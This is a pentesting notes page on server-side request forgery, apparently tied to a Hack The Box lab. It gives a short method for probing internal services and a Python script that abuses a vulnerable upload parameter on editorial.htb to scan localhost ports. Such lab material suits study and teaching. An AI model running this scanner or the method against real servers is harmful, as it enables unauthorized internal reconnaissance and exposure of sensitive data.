SSRF

Server Side Request Reforgery

`Methodology`

Watch for any unexpected redirects, especially to internal or private IP. These can often indicate a vulnerable SSRF endpoint.
Use a listener to see if the server is initiating outbound connections. This helps confirm if the server is making requests to external resources.
Pay special attention to which ports are open on the localhost, as they might indicate internal services that can be targeted.
If you discover that there are open ports on internal services, try querying them via the vulnerable parameter. This could reveal sensitive information, such as metadata, headers, or responses that were not intended to be exposed.
If the SSRF vulnerability exposes endpoints, like internal API, try querying those endpoints from the vulnerable parameter.

`Port Scanner`

Use this script to enumerate open ports on the localhost:

#!/usr/bin/python3
import requests

with open("a", 'wb') as f:
    f.write(b'')

for port in range(1, 65535):
    with open("a", 'rb') as file:
        data_post = {"bookurl": f"http://127.0.0.1:{port}"}   # Vulnerable Parameter
        data_file = {"bookfile": file}    # Mandatory Parameter
    try:
        r = requests.post("http://editorial.htb/upload-cover", files=data_file, data=data_post) # Vunerable URL
        if not r.text.strip().endswith('.jpeg'):     # Filtering response
            print(f"{port} --- {r.text}")
    except requests.RequestException as e:
        print(f"Error on port {port}: {e}")

Modify the parameters for your use case.

PreviousSession Hijacking NextEval Injection

Last updated 5 months ago